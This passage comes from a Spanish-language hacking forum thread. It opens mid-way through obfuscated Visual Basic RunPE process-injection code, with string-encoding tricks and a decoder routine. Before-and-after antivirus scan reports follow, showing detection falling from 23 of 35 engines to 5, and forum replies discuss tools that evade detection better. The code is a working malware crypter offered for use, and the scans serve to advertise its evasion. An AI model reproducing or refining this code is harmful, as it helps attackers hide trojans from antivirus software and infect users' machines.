  411.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  412.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  413.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  414. )))))))))))), cQdlVdwtG.hThread, VarPtr(sGbh6tdbF)
  415. WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal sGbh6tdbF.Ebx + 8, dxNCenpxr.OptionalHeader.ImageBase, 4, 0
  416. sGbh6tdbF.Eax = dxNCenpxr.OptionalHeader.ImageBase + dxNCenpxr.OptionalHeader.AddressOfEntryPoint
  417. u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
  418.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  419.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  420.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  421.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  422.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  423. )))))))))))), GCcQ9b7nT(Chr(5) & Chr(43) & Chr(56) & Chr(31) & Chr(39) & Chr(49) & Chr(48) & Chr(57) & Chr(35) & Chr(19) & Chr(32) & Chr(43) & Chr(36) & Chr(43) & Chr(63) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
  424.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  425.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  426.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  427.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  428.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  429. )))))))))))), cQdlVdwtG.hThread, VarPtr(sGbh6tdbF)
  430. u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
  431.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  432.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  433.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  434.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  435.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  436. )))))))))))), GCcQ9b7nT(Chr(4) & Chr(43) & Chr(63) & Chr(62) & Chr(34) & Chr(38) & Chr(1) & Chr(48) & Chr(53) & Chr(53) & Chr(46) & Chr(33), kMIvzyLCQ(StrReverse(Chr$(92) _
  437.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  438.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  439.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  440.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  441.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  442. )))))))))))), cQdlVdwtG.hThread
  443. End Sub
  444.  
  445. Public Function kMIvzyLCQ(FhbXF8MVH As String, lPCqbkM9x As Integer)
  446.     Dim kDFZMkl0Q As Integer
  447.    
  448.     For kDFZMkl0Q = 1 To Len(FhbXF8MVH)
  449.         Mid(FhbXF8MVH, kDFZMkl0Q, 1) = Chr(Asc(Mid(FhbXF8MVH, kDFZMkl0Q, 1)) - lPCqbkM9x)
  450.     Next kDFZMkl0Q
  451.     kMIvzyLCQ = FhbXF8MVH
  452. End Function
  453.  

Antes:

Date and Time: 10/11/2012 3:45:23 P
File Name: sPrueba1.exe
File Size: 16384 Bytes
MD5: 672d19493b2faeb7cf8cf3ea64f51890
SHA1: e149fa00bb18b624fd51d13cdc8c8d7cb58035e8
Detection: 23 of 35 (66%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Win32:Inject-ATA [Trj]
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Gen:Trojan.Heur.ZGY.8
VirusBuster Internet Security - Trojan.VBInject.Gen.7
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Trojan.VbCrypt.89
eTrust-Vet - Win32/VBInject.D!generic
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Gen:Trojan.Heur.ZGY.8
G Data - Gen:Trojan.Heur.ZGY.8, Win32:Inject-ATA [Trj]
IKARUS Security - Virus.Win32.VBInject
Kaspersky Antivirus - Worm.Win32.VBNA.b
McAfee - Clean!
MS Security Essentials - VirTool:Win32/VBInject.RT
ESET NOD32 - Trojan.Win32/Injector.WZ
Norman - W32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Virus.Win32.VBInject!IK
Quick Heal Antivirus - Clean!
Rising Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBInject-AK
Trend Micro Internet Security - Clean!
VBA32 Antivirus - infected Trojan.VB.Levelup
Vexira Antivirus - Trojan.VBInject.Gen.7
Zoner AntiVirus - Clean!
Ad-Aware - VirTool.Win32.VBInject.gen.bp (v)

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Ahora:

Date and Time: 10/11/2012 3:53:27 P
File Name: sPrueba4.exe
File Size: 24576 Bytes
MD5: 847f8117c78d7e42d06b3ec11f4462f5
SHA1: ee1263d4edfab9f052f148ae6a76428cfcef8969
Detection: 5 of 35 (14%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Clean!
VirusBuster Internet Security - Clean!
Clam Antivirus - Clean!
COMODO Internet Security - TrojWare.Win32.Agent.angn@220045096
Dr.Web - Clean!
eTrust-Vet - Clean!
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Clean!
G Data - Clean!
IKARUS Security - Clean!
Kaspersky Antivirus - Clean!
McAfee - Clean!
MS Security Essentials - Clean!
ESET NOD32 - Clean!
Norman - Clean!
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Clean!
Quick Heal Antivirus - Clean!
Rising Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBCheMan-D
Trend Micro Internet Security - Clean!
VBA32 Antivirus - Clean!
Vexira Antivirus - Clean!
Zoner AntiVirus - Clean!
Ad-Aware - Clean!
BullGuard - Clean!
Immunet Antivirus - Clean!
K7 Ultimate - Riskware ( ed2edfef0 )
VIPRE - Clean!

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desfrutem y Saludo Bros
« Última modificación: Mayo 12, 2014, 02:47:02 pm por Expermicid »

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #1 en: Octubre 11, 2012, 05:42:54 pm »
pero si esta randomizado con aco...
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado k0ws

  • *
  • Underc0der
  • Mensajes: 145
  • Actividad:
    0%
  • Reputación 0
  • I'm Back
    • Ver Perfil
  • Skype: k0wsit0
« Respuesta #2 en: Octubre 11, 2012, 07:48:15 pm »
Gracias por aportar, aun asi es lo que dice sanko... Esto bien hecho en 2 clicks se hae con ACO, y dejandolo con menos detecciones.

-Saludos-

Desconectado wh0!

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #3 en: Octubre 12, 2012, 02:58:49 am »
JAJAJAJAJAJAJAJAJAJAJAJAJA!  :o

 

¿Te gustó el post? COMPARTILO!



RunPE ASM en linea

Iniciado por Danyfirex

Respuestas: 0
Vistas: 2407
Último mensaje Abril 30, 2013, 06:40:42 pm
por Danyfirex